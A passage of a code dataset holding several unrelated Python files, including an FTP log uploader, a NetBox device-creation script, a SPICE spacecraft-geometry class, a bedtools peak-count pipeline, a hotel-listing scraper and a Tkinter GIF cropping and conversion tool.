sorted(\n zip(self.lr_finder.history[\"loss\"], self.lr_finder.history[\"lr\"])\n )\n ]\n\n logger.info(f\"sorted lrs : {sorted_lrs[:10]}\")\n\n logger.info(f\"found the best lr : {self.best_lr}\")\n\n logger.info(\"plotting lr_finder\")\n\n plt.style.use(\"dark_background\")\n self.lr_finder.plot()\n\n # reset the model and the optimizer\n self.lr_finder.reset()\n plt.show()\n\n del model, optimizer, criterion\n","sub_path":"TinyImageNet/Session1/dl_vision/runner/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":11438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"169521808","text":"#coding=utf-8\nimport shutil\nimport os\nfrom ftplib import FTP\nimport os\nimport tarfile\n\ndef LogUpload(LogName):\n ftp = FTP()\n timeout = 30\n port = 21\n ftp.connect('192.168.1.100', port, timeout)\n ftp.login('administrator', 'yakai888')\n print(ftp.getwelcome())\n\n #ftp.mkd(\"TestLog/log\") #新建文件夹\n ftp.cwd(\"TestLog/PowerBoard\") #创建操作目录\n\n localpath = \"/home/pi/Desktop/work/Finalversion/Moto/\"\n localfile = localpath + LogName + '.csv'\n f=open(localfile,'rb')\n\n ftp.storbinary('STOR %s' % os.path.basename(localfile),f)\n","sub_path":"MotoBoard/LogUpload.py","file_name":"LogUpload.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"582969305","text":"#!/usr/bin/env python3\n# -*- coding: utf-8\n\nimport sys\nimport numpy\nimport scipy.stats as stats\n\n\ndef average_and_ci(data, confidence_level = .95):\n\tavg = numpy.average(data)\n\tstd = numpy.std(data, ddof=1)\n\tp = 1.0 - (1.0-confidence_level)/2\n\tconfidence_interval = stats.t.ppf(p, len(data)-1)*std/(len(data)**0.5)\n\treturn (avg, confidence_interval)\n\n\ndef read_float_values_from_file(file, field):\n\tv = []\n\tfor line in file:\n\t\tif line != \"\" and line[0] != '*':\n\t\t\ttry:\n\t\t\t\tspl = line.strip().split()\n\t\t\t\tif len(spl) < field:\n\t\t\t\t\tprint ('Invalid field at line:', line, file=sys.stderr)\n\t\t\t\telse:\n\t\t\t\t\tv.append(float(spl[field - 1]))\n\t\t\texcept:\n\t\t\t\tpass\n\treturn v\n\n\n#Programa principal\n\n\nfield = 1\n\nif len(sys.argv) == 2:\n field = int(sys.argv[1])\nvalues = read_float_values_from_file(sys.stdin, field)\n(m, ci) = average_and_ci(values, 0.95)\nprint (\"%.3f ± %.3f\" % (m, ci))\n#print (\"%.3f\" % m)\n\n\n\n\n","sub_path":"nerre/scripts/avg_ci.py","file_name":"avg_ci.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"132119001","text":"from django.utils.text import slugify\nfrom django.contrib.contenttypes.models import ContentType\nfrom tenancy.models import Tenant\nfrom dcim.choices import DeviceStatusChoices, SiteStatusChoices\nfrom dcim.models import Device, DeviceRole, DeviceType, Manufacturer, Site, Rack, Interface\nfrom ipam.models import Aggregate, IPAddress, Prefix, RIR, Role, RouteTarget, Service, VLAN, VLANGroup, VRF\nfrom extras.scripts import *\nfrom extras.models import CustomField\nfrom utilities.forms import (\n APISelect, APISelectMultiple, add_blank_choice, BootstrapMixin, BulkEditForm, BulkEditNullBooleanSelect,\n ColorSelect, CommentField, CSVChoiceField, CSVContentTypeField, CSVModelChoiceField, CSVModelForm,\n DynamicModelChoiceField, DynamicModelMultipleChoiceField, ExpandableNameField, form_from_model, JSONField,\n NumericArrayField, SelectWithPK, SmallTextarea, SlugField, StaticSelect2, StaticSelect2Multiple, TagFilterField,\n BOOLEAN_WITH_BLANK_CHOICES,\n)\nfrom CMDBuildNLMK import CMDBuildNLMK as cmdb\n\nclass createSGJuniperSwitch(Script):\n class Meta:\n name = 'Create Juniper switch for SG sites'\n description = 'Create Juniper switch for SG sites'\n field_order = ['site','rack','sw_name','sw_int_name','sw_int_ip']\n\n SERVICESLIST = (\n ('s2','SSHv2'),\n ('s1','SSHv1'),\n ('t','Telnet'),\n ('y','YANG'),\n ('r','REST'),\n )\n \n location = StringVar(\n description = 'Location place',\n label = 'Location',\n required = False\n )\n\n inventory = StringVar(\n description = 'Inventory number',\n label = 'Inventory number NOT USE',\n required = False\n )\n\n sticker = StringVar(\n description = 'Stick number NOT USE',\n label = 'Stick number',\n required = False\n )\n\n dev_name = StringVar(\n description = 'Switch name',\n label = 'Device name'\n )\n\n dev_serial = StringVar(\n description = 'Serial number',\n label = 'Serial number'\n )\n\n dev_model = ObjectVar(\n model = DeviceType,\n label = 'Device model',\n description = 'Device model',\n display_field = 'model',\n query_params = {\n 'manufacturer_id' : '73'\n }\n )\n\n site = ObjectVar(\n model = Site,\n description = 'Site',\n display_field = 'name',\n query_params = {\n 'tenant' : 'sg'\n }\n )\n\n rack = ObjectVar(\n model = Rack,\n description = 'Rack',\n display_field = 'name',\n query_params = {\n 'site_id' : '$site'\n }\n )\n\n position = IntegerVar(\n description = 'Unit',\n widget=APISelect(\n api_url='/api/dcim/racks/{{rack}}/elevation/',\n attrs={\n 'disabled-indicator': 'device',\n 'data-query-param-face': \"[\\\"$face\\\"]\",\n }\n )\n\n )\n\n mgmt_int_name = StringVar(\n description = 'MGMT vlan name',\n label = 'MGMT virtual interface name'\n\n )\n\n mgmt_int_ip = StringVar(\n description = 'with CIDR, example 10.1.1.1/24',\n label = 'MGMT ip address'\n\n\n )\n\n monitoring = BooleanVar(\n description = 'Set to monitoring NOT USE',\n default = 'True'\n )\n\n backup = BooleanVar(\n description = 'Set to backup NOT USE',\n default = 'True'\n\n )\n\n services = MultiChoiceVar(label = 'Services', description = 'multiselect allow', choices=SERVICESLIST)\n\n\n def run(self,data,commit):\n\n services_list = [\n {'id_s':'s2','port':22,'name':'SSHv2','protocol':'tcp'},\n {'id_s':'s1','port':22,'name':'SSHv1','protocol':'tcp'},\n {'id_s':'t','port':23,'name':'Telnet','protocol':'tcp'},\n {'id_s':'y','port':443,'name':'YANG','protocol':'tcp'},\n {'id_s':'r','port':443,'name':'REST','protocol':'tcp'},\n ]\n\n\n dev_role = DeviceRole.objects.get(slug = 'access-switch')\n device_new = Device(\n name = data['dev_name'],\n device_type = data['dev_model'],\n site = data['site'],\n rack = data['rack'],\n position = data['position'],\n device_role = dev_role,\n serial = data['dev_serial'],\n )\n device_new.save()\n\n #device_new.custom_field_data['fMonitoring'] = data['monitoring']\n #device_new.custom_field_data['fBackup'] = data['backup']\n device_new.custom_field_data['device_location'] = data['location']\n device_new.save()\n\n output = []\n for iServ in data['services']:\n output.append(iServ)\n print(output)\n res = [row for row in services_list if row['id_s'] == iServ]\n s1 = Service(\n device = device_new,\n name = res[0]['name'],\n ports = [res[0]['port']],\n protocol = res[0]['protocol'],\n )\n s1.save()\n\n\n dev_mgmt_int = Interface(\n device = device_new,\n name = data['mgmt_int_name'],\n type = 'virtual',\n )\n dev_mgmt_int.save()\n\n ipa_type = ContentType.objects.get(app_label='dcim',model='interface')\n ipa = IPAddress(\n address = data['mgmt_int_ip'],\n assigned_object_id = dev_mgmt_int.id,\n assigned_object_type = ipa_type,\n )\n ipa.save()\n\n device_new.primary_ip4 = ipa\n\n device_new.save()\n\n self.log_success(f\"Created new Juniper device: {device_new}\")\n\n\n try:\n c1 = cmdb(username=\"\",password=\"\") #TEST!!!!\n r1 = c1.connect()\n self.log_success(f\"CMDB connect: {r1}\")\n\n new_card = {\n \"Code\": device_new.name,\n \"Hostname\": device_new.name,\n \"Availability\":72,\n \"State\":121,\n \"SerialNumber\": device_new.serial,\n \"Notes\":\"TEST API from NetBOX scripts\",\n }\n \n r4 = c1.insert_card_NetworkBox(card_data = new_card)\n self.log_success(f\"CMDB connect: {r4}\")\n r2 = c1.close()\n except:\n self.log_success(f\"CMDB item not create\") #TEST!!!\n\n \n\n\n\n return ''.join(output)\n","sub_path":"createSGJuniperSwitch.py","file_name":"createSGJuniperSwitch.py","file_ext":"py","file_size_in_byte":6284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"168572407","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3350)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/mcosta/Dropbox/SPICE/SPICE_CROSS_MISSION/spiops/spiops/classes/body.py\n# Compiled at: 2018-07-19 04:54:11\n# Size of source mod 2**32: 11574 bytes\nimport spiceypy as cspice, numpy as np\nfrom spiops.utils import utils\n\nclass Body(object):\n\n def __init__(self, body, time=object(), target=None):\n if isinstance(body, str):\n name = body\n id = cspice.bodn2c(body)\n else:\n id = body\n name = cspice.bodc2n(body)\n if target:\n self.target = target\n self.name = name\n self.id = id\n self.time = time\n self.previous_tw = []\n self.geometry_flag = False\n\n def __getattribute__(self, item):\n if item in ('altitude', 'distance', 'zaxis_target_angle', 'zaxis_earth_angle'):\n self._Body__Geometry()\n return object.__getattribute__(self, item)\n else:\n if item in ('sa_ang_p', 'sa_ang_n', 'sa_ang', 'saa_sa', 'saa_sc', 'hga_earth',\n 'hga_el_az'):\n self._Body__Structures()\n return object.__getattribute__(self, item)\n return object.__getattribute__(self, item)\n\n def __getattr__(self, item):\n if item in ('state_in_window', ):\n self._Body__StateInWindow()\n return object.__getattribute__(self, item)\n\n def State(self, target=False, reference_frame=False, current=False):\n if self.target and not target and not reference_frame:\n target = self.target.name\n reference_frame = self.target.frame\n if not self.target:\n if target is False:\n target = 'J2000'\n if reference_frame is False:\n reference_frame = 'J2000'\n self.trajectory_reference_frame = reference_frame\n if not current:\n current = self.time.current\n state, lt = cspice.spkezr(target, current, reference_frame, self.time.abcorr, self.name)\n return state\n\n def Orientation(self, frame='', target_frame='', current=False, format='msop quaternions'):\n if self.target and not target_frame:\n target_frame = self.target.frame\n if not self.target and not target_frame:\n target_frame = 'J2000'\n if not frame:\n frame = self.frame\n if not current:\n current = self.time.current\n else:\n current = current\n rot_mat = cspice.pxform(target_frame, frame, current)\n if format == 'spice quaternions':\n orientation = cspice.m2q(rot_mat)\n if format == 'msop quaternions':\n quaternions = cspice.m2q(rot_mat)\n orientation = [-quaternions[1],\n -quaternions[2],\n -quaternions[3],\n quaternions[0]]\n else:\n if format == 'euler angles':\n orientation = cspice.m2eul(rot_mat, 3, 2, 1)\n elif format == 'rotation matrix':\n orientation = rot_mat\n return orientation\n\n def __StateInWindow(self, target=False, reference_frame=False, start=False, finish=False):\n state_in_window = []\n for et in self.time.window:\n state_in_window.append(self.State(target, reference_frame, et))\n\n self.state_in_window = state_in_window\n\n def __Structures(self):\n if self.structures_flag is True and self.time.window.all() == self.previous_tw.all():\n return\n time = self.time\n import spiops\n sa_ang_p_list = []\n sa_ang_n_list = []\n saa_sa_list = []\n saa_sc_list = []\n hga_earth = []\n hga_angles = []\n for et in time.window:\n sa_ang_p = spiops.solar_array_angle('TGO_SA+Z', et)\n sa_ang_n = spiops.solar_array_angle('TGO_SA+Z', et)\n saa = spiops.solar_aspect_angles('TGO', et)\n sa_ang_p_list.append(sa_ang_p)\n sa_ang_n_list.append(sa_ang_n)\n saa_sa_list.append(saa[0])\n saa_sc_list.append(saa[1])\n hga_angles, hga_earth = spiops.hga_angles('MPO', et)\n\n self.sa_ang_p = sa_ang_p_list\n self.sa_ang_n = sa_ang_n_list\n self.sa_ang = [sa_ang_p_list, sa_ang_n_list]\n self.saa_sa = saa_sa_list\n self.saa_sc = saa_sc_list\n self.hga_earth = hga_earth\n self.hga_angles = hga_angles\n self.structures_flag = True\n self.previous_tw = self.time.window\n\n def __Geometry(self):\n distance = []\n altitude = []\n subpoint_xyz = []\n subpoint_pgc = []\n subpoint_pcc = []\n zaxis_target_angle = []\n tar = self.target\n time = self.time\n for et in time.window:\n ptarg, lt = cspice.spkpos(tar.name, et, tar.frame, time.abcorr, self.name)\n vout, vmag = cspice.unorm(ptarg)\n distance.append(vmag)\n spoint, trgepc, srfvec = cspice.subpnt(tar.method, tar.name, et, tar.frame, time.abcorr, self.name)\n subpoint_xyz.append(spoint)\n dist = cspice.vnorm(srfvec)\n altitude.append(dist)\n spglon, spglat, spgalt = cspice.recpgr(tar.name, spoint, tar.radii_equ, tar.flat)\n spglon *= cspice.dpr()\n spglat *= cspice.dpr()\n subpoint_pgc.append([spglon, spglat, spgalt])\n spcrad, spclon, spclat = cspice.reclat(spoint)\n spclon *= cspice.dpr()\n spclat *= cspice.dpr()\n subpoint_pcc.append([spcrad, spclon, spclat])\n obs_tar, ltime = cspice.spkpos(tar.name, et, 'J2000', time.abcorr, self.name)\n obs_zaxis = [0, 0, 1]\n try:\n matrix = cspice.pxform(self.frame, 'J2000', et)\n vecout = cspice.mxv(matrix, obs_zaxis)\n zax_target_angle = cspice.vsep(vecout, obs_tar)\n zax_target_angle *= cspice.dpr()\n zaxis_target_angle.append(zax_target_angle)\n except:\n zaxis_target_angle.append(0.0)\n\n self.distance = distance\n self.altitude = altitude\n self.subpoint_xyz = subpoint_xyz\n self.subpoint_pgc = subpoint_pgc\n self.subpoint_pcc = subpoint_pcc\n self.zaxis_target_angle = zaxis_target_angle\n self.geometry_flag = True\n self.previous_tw = self.time.window\n\n def Plot(self, yaxis='distance', date_format='TDB', external_data=[], notebook=False):\n self._Body__Geometry()\n self._Body__Structures()\n if yaxis == 'sa_ang':\n yaxis_name = [\n 'sa_ang_p', 'sa_ang_n']\n else:\n if yaxis == 'saa_sc':\n yaxis_name = [\n 'saa_sc_x', 'saa_sc_y', 'saa_sc_z']\n else:\n if yaxis == 'saa_sa':\n if self.name != 'MPO':\n yaxis_name = [\n 'saa_sa_p', 'saa_sa_n']\n else:\n yaxis_name = [\n 'saa_sa']\n else:\n if yaxis == 'hga_angles':\n yaxis_name = [\n 'hga_el', 'hga_az']\n else:\n yaxis_name = yaxis\n utils.plot(self.time.window, self.__getattribute__(yaxis), notebook=notebook, external_data=external_data, yaxis_name=yaxis_name, mission=self.name, target=self.target.name, date_format=date_format)\n\n def Plot3D(self, data='trajectory', reference_frame=False):\n if not self.state_in_window:\n self._Body__StateInWindow(reference_frame=reference_frame)\n data = self.state_in_window\n utils.plot3d(data, self, self.target)\n\n\nclass Target(Body):\n\n def __init__(self, body, time=object(), target=False, frame='', method='INTERCEPT/ELLIPSOID'):\n \"\"\"\n\n :param body:\n :type body:\n :param time:\n :type time:\n :param target: It no target is provided the default is 'SUN'\n :type target:\n :param frame:\n :type frame:\n :param method:\n :type method:\n \"\"\"\n if not target:\n target = Target('SUN', time=time, target=object())\n super(Target, self).__init__(body, time=time, target=target)\n if not frame:\n self.frame = 'IAU_{}'.format(self.name)\n else:\n self.frame = frame\n self.method = method\n self._Target__getRadii()\n\n def __getRadii(self):\n try:\n self.radii = cspice.bodvar(self.id, 'RADII', 3)\n except:\n print('Ephemeris object has no radii')\n return\n\n self.radii_equ = self.radii[0]\n self.radii_pol = self.radii[2]\n self.flat = (self.radii_equ - self.radii_pol) / self.radii_equ\n\n\nclass Observer(Body):\n\n def __init__(self, body, time=object(), target=False, frame=''):\n super(Observer, self).__init__(body, time=time, target=target)\n if not frame:\n self.frame = '{}_SPACECRAFT'.format(self.name)\n if cspice.namfrm(self.frame) == 0:\n self.frame = self.name\n if cspice.namfrm(self.frame) == 0:\n self.frame = '{}_LANDER'.format(self.name)\n print('The frame name has not been able to be built; please introduce it manually')\n else:\n self.frame = frame","sub_path":"pycfiles/spiops-0.4.4-py3-none-any/body.cpython-35.py","file_name":"body.cpython-35.py","file_ext":"py","file_size_in_byte":9491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"555169360","text":"#! /usr/bin/env python\n# encoding: utf-8\nfrom bsub import bsub\nfrom pybedtools import BedTool\nfrom toolshed import reader\nimport os\nimport os.path as op\nimport pandas as pd\nimport sys\nimport fnmatch\n\ndef getfilelist(path, pattern):\n files = []\n for root, dirnames, filenames in os.walk(path):\n for filename in fnmatch.filter(filenames, pattern):\n files.append(op.join(root, filename))\n return files\n\ndef counts(samples, result_path, peak_ext, bam_ext):\n # get the consensus peaks\n f = open(\"%s/peak_coordinates.bed\" % result_path, 'w')\n x = BedTool()\n consensus = x.multi_intersect(i=getfilelist(result_path, \"*%s\" % peak_ext))\n for c in consensus:\n # fixing formatting from bedtool object\n replicate_counts = c.name\n if replicate_counts < 2: continue\n \n fields = [c.chrom, c.start, c.stop, \"%s:%d-%d\\n\" % \\\n (c.chrom, c.start, c.stop)]\n f.write(\"\\t\".join(map(str, fields)))\n f.close()\n # get counts for each sample\n jobs = []\n countfiles = []\n for sample in samples:\n bams = getfilelist(result_path, sample + \"*%s\" % bam_ext)\n assert(len(bams) == 1)\n outdir = result_path.rstrip(\"/\") + \"/\" + sample\n countsresult = outdir + \"/\" + sample + \".counts\"\n countfiles.append(countsresult)\n if op.exists(countsresult): continue\n cmd = \"bedtools coverage -abam %s -b %s > %s\" % \\\n (bams[0], f.name, countsresult)\n jobid = bsub(sample + \"_counts\", \n R=\"select[mem>16] rusage[mem=16] span[hosts=1]\",\n verbose=True)(cmd)\n jobs.append(jobid)\n bsub.poll(jobs)\n # counts to matrix\n allcounts = {}\n for cf in countfiles:\n cfname = op.basename(cf).split(\".counts\")[0]\n casecounts = {}\n for toks in reader(cf, header=\"chrom start stop name a_overlaps_in_b \\\n b_with_nonzero length_b frac_b_nonzero\".split()):\n casecounts[toks['name']] = int(toks['a_overlaps_in_b'])\n allcounts[cfname] = casecounts\n countsdf = pd.DataFrame(allcounts)\n countsdf.to_csv(sys.stdout, sep=\"\\t\", header=True)\n\ndef main(args):\n counts(args.samples, args.result_path, args.peak_ext, args.alignment_ext)\n\nif __name__ == \"__main__\":\n import argparse\n p = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter)\n p.add_argument('--samples', required=True, nargs=\"+\", help='sample names')\n p.add_argument('--result_path', required=True, help='parent directory of sample results')\n p.add_argument('--peak_ext', default=\"_peaks.bed\", help=\"file extension to search for [ _peaks.bed ]\")\n p.add_argument('--alignment_ext', default=\".bam\", help=\"file extension to search for [ .bam ]\")\n args = p.parse_args()\n main(args)","sub_path":"archive/leinwand/bin/counts.py","file_name":"counts.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"122934929","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.example, name='exampl'),\n path('contact/', views.contact, name='contact'),\n path('home/', views.home, name='blog-home'),\n path('contacti/', views.contacti, name='blog-contacti'),\n path('colt/', views.colt, name='colt'),\n]\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"378017401","text":"import os\nimport inspect\n\ndef mkdir_if_not_exist(dir_list):\n for directory in dir_list:\n if not os.path.exists(directory):\n os.makedirs(directory)\n\ncurr_filename = inspect.getfile(inspect.currentframe())\nroot_dir = os.path.dirname(os.path.abspath(curr_filename))\n\n\norigin_data_dir = os.path.join(root_dir, 'origin_data')\ntrain_image_aug_dir = os.path.join(origin_data_dir, 'train_image_aug')\ntrain_image_dir = os.path.join(origin_data_dir, 'train_image')\ntest_image_dir = os.path.join(origin_data_dir, 'test_image')\n\ntest_visit_dir = os.path.join(origin_data_dir, 'test_visit')\n\ncached_dir = os.path.join(root_dir, 'cache')\nmkdir_if_not_exist(dir_list=[cached_dir])\n\ntrain_images_npy = os.path.join(cached_dir, 'train_images.npy')\ntrain_labels_npy = os.path.join(cached_dir, 'train_labels.npy')\ntest_images_npy = os.path.join(cached_dir, 'test_images.npy')\n\n\ntrain_ids_npy = os.path.join(cached_dir, 'train_images_ids.npy')\ntrain_visit_dir = os.path.join(origin_data_dir, 'train_visit.npy')\ntrain_visits_origin_npy = os.path.join(cached_dir, 'train_visits_origin.npy')\ntrain_visits_274_npy = os.path.join(cached_dir, 'train_visits_274.npy')\ntrain_visits_224_npy = os.path.join(cached_dir, 'train_visits_224.npy')\n\ntest_ids_npy = os.path.join(cached_dir, 'test_images_ids.npy')\ntest_visit_dir = os.path.join(origin_data_dir, 'test_visit.npy')\ntest_visits_origin_npy = os.path.join(cached_dir, 'test_visits_origin.npy')\ntest_visits_274_npy = os.path.join(cached_dir, 'test_visits_274.npy')\ntest_visits_224_npy = os.path.join(cached_dir, 'test_visits_224.npy')\n\n\n\nmodel_path = os.path.join(root_dir, 'model', 'model.h5')\n\nresult_data_path = os.path.join(root_dir, 'result_data.txt')\n\nvisits_274_new_feature_npy = os.path.join(cached_dir, 'visits_274_new_feature.npy')\nvisits_224_new_feature_npy = os.path.join(cached_dir, 'visits_224_new_feature.npy')","sub_path":"paths.py","file_name":"paths.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"491428700","text":"import requests\nimport json\nfrom bs4 import BeautifulSoup\nfrom pprint import pprint\n\ndef find_hotels(city, checkin, checkout, rooms, guests):\n inc,inb,ina = checkin.split('-')\n outc,outb,outa = checkout.split('-')\n roomConf = ''\n for i in range(int(rooms)):\n roomConf += ('&roomConfig='+guests[i])\n pgno = 1\n hotel_list = []\n hotel_counter = 1\n while True:\n url = 'https://www.oyorooms.com/hotels-in-'+city+'/?checkin='+ina+'%2F'+inb+'%2F'+inc+'&checkout='+outa+'%2F'+outb+'%2F'+outc+'&page='+str(pgno)+roomConf\n print(url)\n\n r = requests.get(url)\n soup = BeautifulSoup(r.text, 'html.parser')\n # print(soup)\n \n hotels = 0\n for row in soup.find_all('div',{'class':'hotelCardListing'}):\n hotels += 1\n info = {}\n info['id'] = hotel_counter\n hotel_counter += 1\n imageSection = row.find('div', {'class':'hotelCardListing__imgCardWrapper'})\n images = imageSection.find_all('img')\n nonlz = False\n img_links = []\n for img in images:\n src = img['src']\n if 'lazy' not in src:\n img_links.append(src)\n nonlz = True\n # print(img_links)\n info['imgs'] = img_links\n # print(nonlz)\n if nonlz:\n description = row.find('div', {'class':'listingHotelDescription'})\n metas = description.find_all('meta')\n for meta in metas:\n # print(meta['itemprop'],':',meta['content'])\n info[meta['itemprop']] = meta['content']\n nametag = row.find('h3')\n info['name'] = nametag.text\n # print(nametag)\n address = row.find('span',{'class':'u-line--clamp-2'})\n info['address'] = address.text\n am_list = row.find_all('div',{'class':'amenityWrapper__amenity'})\n amenities = []\n for amenity in am_list:\n amenities.append(amenity.find('span').text.strip())\n info['amenities'] = amenities[:-1]\n if 'ratingValue' not in info:\n info['ratingValue'] = 'NEW'\n discounted,og = info['priceRange'].split('-')\n #print(discounted, og)\n discounted = discounted.strip()\n og = og.strip()\n # print(discounted[1:], og[1:])\n if int(discounted[1:]) < int(og[1:]):\n info['price'] = discounted\n info['old'] = og\n else:\n info['price'] = og\n # print(info['price'])\n dtr = requests.get(info['url'])\n dtsoup = BeautifulSoup(dtr.text, 'html.parser')\n desctag = dtsoup.find('div',{'class':'c-u43rea'})\n if desctag:\n loc = desctag.text.find('Special Features')\n info['description'] = desctag.text[8:loc].strip()\n # print(info['description'])\n policies_ul = dtsoup.find('ul',{'class':'c-f0mxva'})\n if policies_ul:\n policies_li = policies_ul.find_all('li')\n policies = []\n for p in policies_li[1:]:\n policies.append(p.text)\n info['policies'] = policies\n print(info['policies'])\n hotel_list.append(info)\n if hotels > 0 and pgno < 4:\n pgno += 1\n else:\n break\n return hotel_list\n\n# ans = find_hotels('mumbai','07-12-2019','10-12-2019','2',['1','2'])\n# print(len(ans))\n# for a in ans:\n# print(a['id'])","sub_path":"hotels_scrape.py","file_name":"hotels_scrape.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"150512033","text":"import Pmw\nfrom tkinter import *\nfrom PIL import Image, ImageTk, ImageSequence\nfrom tkinter import filedialog\nfrom tkinter.filedialog import askopenfilename, askdirectory\nimport threading\nimport os\n\nventana = Pmw.initialise(fontScheme = 'pmw1')\nventana.title(\"GIF CUTTER\")\nventana.configure(bg=\"LightBlue3\")\n_start = (0,0)\n_end=\"\"\nsize=\"\"\narchivo_selec = \"\"\nim = \"\"\nver = False\ncanvas = \"\"\n\ndef inicia_conv():\n if im!=\"\":\n t3 = threading.Thread(target=convertir)\n t3.start()\n\ndef convertir():\n nombrea,ex=os.path.splitext(((archivo_selec).split(\"/\"))[-1])\n if ex=='.webp':\n nom=nombrea+'(CONV).gif'\n im.save(nom,'gif',save_all=True,background=0)\n else:\n nom=nombrea+'(CONV).webp'\n im.save(nom,'webp',save_all=True)\n display.appendtext('Creado archivo: '+nom+'\\n')\n\ndef verify():\n global ver\n ver = True\n top.destroy()\n display.appendtext(\"EFECTUADO RECORTE\\n\")\n\ndef delete_rectangle(event):\n canvas.delete(\"rectangle\")\n crop_btn.config(state=\"disabled\")\n\ndef _on_click(event):\n global _start\n global _end\n global canvas\n \n _start = (canvas.canvasx(event.x), canvas.canvasy(event.y))\n _end = None\n crop_btn.config(state=\"normal\")\n\ndef _draw_rectangle():\n global canvas\n global _end\n global _start\n\n canvas.delete(\"rectangle\")\n\n if _end is None or _start is None: \n return None\n\n x0, y0 = _start\n x1, y1 = _end\n \n\n canvas.create_rectangle(x0, y0, x1, y1, fill=\"#18c194\",\n width=1, stipple=\"gray50\", tags='rectangle'\n )\n \ndef _on_drag(event):\n global _start\n global _end\n global canvas\n\n x0, y0 = _start\n ex, ey = canvas.canvasx(event.x), canvas.canvasy(event.y)\n _end = (ex, ey)\n _draw_rectangle()\n\ndef clear():\n global archivo_selec, im, ver\n display.delete('1.0',END)\n texto_inicio()\n archivo_selec=\"\"\n im=\"\"\n ver = False\n\ndef recorte():\n global canvas\n root = Tk()\n canv = Canvas(root, width=500, height=375, bg='white')\n canv.grid(row=0, column=0)\n img = ImageTk.PhotoImage(archivo_selec)\n canv.create_image(0, 0, anchor=NW, image=img)\n canv.pack(side=\"left\")\n \n root.mainloop()\n\ndef direc():\n directorio=filedialog.askdirectory()\n if directorio!=\"\":\n os.chdir(directorio)\n display.appendtext(f\"Dir: {os.getcwd()}\"+\"\\n\")\n\ndef iniciar_extract():\n if archivo_selec!=\"\" and im!=\"\":\n t=threading.Thread(target=corta)\n t.start()\n else:\n display.appendtext(\"\\nSELECCIONE UN ARCHIVO\\n\")\n\ndef _on_drop(event):\n global _start\n global _end\n global im\n\n if not _end is None:\n \n # Acotar límites de seleción a la imagen\n img_x, img_y = im.size\n\n x0, y0 = _start\n x0 = img_x if x0 > img_x else 0 if x0 < 0 else x0\n y0 = img_y if y0 > img_y else 0 if y0 < 0 else y0 \n _start = (x0, y0)\n\n x1, y1 = _end\n x1 = img_x if x1 > img_x else 0 if x1 < 0 else x1\n y1 = img_y if y1 > img_y else 0 if y1 < 0 else y1 \n _end = (x1, y1)\n\n # Normalizado para obtener vertice superior izquierdo e inferior derecho\n if x0 > x1:\n if y0 < y1: # _start es el vértice superior derecho\n _start = (x1, y0)\n _end = (x0, y1)\n else: # _start es el vértice inferior derecho\n _start, _end = _end, _start\n else:\n if y0 > y1: # _start es el vértice inferior izquierdo\n _start = (x0, y1)\n _end = (x1, y0)\n\n # Redibujar rectágulo\n _draw_rectangle()\n\ndef recorte():\n global canvas, crop_btn, top\n if archivo_selec!=\"\":\n top = Toplevel()\n canvas = Canvas(top,width=size[0],height=size[1],background='black')\n canvas.pack(padx=0,pady=0)\n archi = ImageTk.PhotoImage(Image.open(archivo_selec))\n canvas.create_image(0,0,image=archi,anchor=NW)\n canvas.bind('',_on_click)\n canvas.bind(\"\", _on_drag)\n canvas.bind('',delete_rectangle)\n canvas.bind(\"\", _on_drop, '+')\n crop_btn = Button(top, text=\"Recortar imagen\", state=\"disabled\", bg=\"light green\",command=verify)\n crop_btn.pack(side=\"bottom\",expand=1, fill=X)\n top.mainloop()\n else:\n display.appendtext(\"PULSE \\'BUSCAR\\' PARA SELECCIONAR UN ARCHIVO\\n\")\n\ndef name_file(cr,c,n):\n if cr == True:\n nf = n+\"_crop \"+str(count)+\".png\"\n else:\n nf = n+\" \"+str(count)+\".png\"\n return nf\n\ndef corta():\n global _start, _end, ver, count\n if ver == True:\n box = (_start+_end)\n cropped = True\n else:\n box = ((0,0)+size)\n cropped = False\n print(box)\n display.delete('1.0',END)\n display.appendtext(\"\\nPROCESO EN CURSO\\n\")\n count=1\n archivo=(((archivo_selec).split(\"/\"))[-1])\n try:\n name,ex = os.path.splitext(archivo)\n for frame in ImageSequence.Iterator(im):\n nom_imagen=name_file(cropped,count,name)\n c_im=im.crop(box)\n c_im.save(nom_imagen)\n display.appendtext(\"\\nExtraido frame: \"+nom_imagen)\n count+=1\n display.appendtext(\"\\n\\nPROCESO FINALIZADO :D\\n\")\n \n except:\n display.appendtext(\"\\nHUBO UN PROBLEMA AL REALIZAR LA OPERACIÓN\")\n ver = False\n \ndef busca():\n global archivo_selec\n global im, size, archivo\n global _end, ver\n archivo_selec = askopenfilename(parent=ventana, initialdir=\"M:/\",title='Elegir archivo.')\n archivo=(((archivo_selec).split(\"/\"))[-1])\n if archivo_selec!=\"\":\n try:\n im=Image.open(archivo_selec)\n size=(im.size)\n display.appendtext(\"Archivo seleccionado: \"+(((archivo_selec).split(\"/\"))[-1])+\"\\n\")\n except:\n archivo_selec = \"\"\n display.appendtext(\"NO SE PUDO ABRIR EL ARCHIVO\\n\")\n\n \ndef texto_inicio():\n display.appendtext(\"_____________________________\\n\")\n 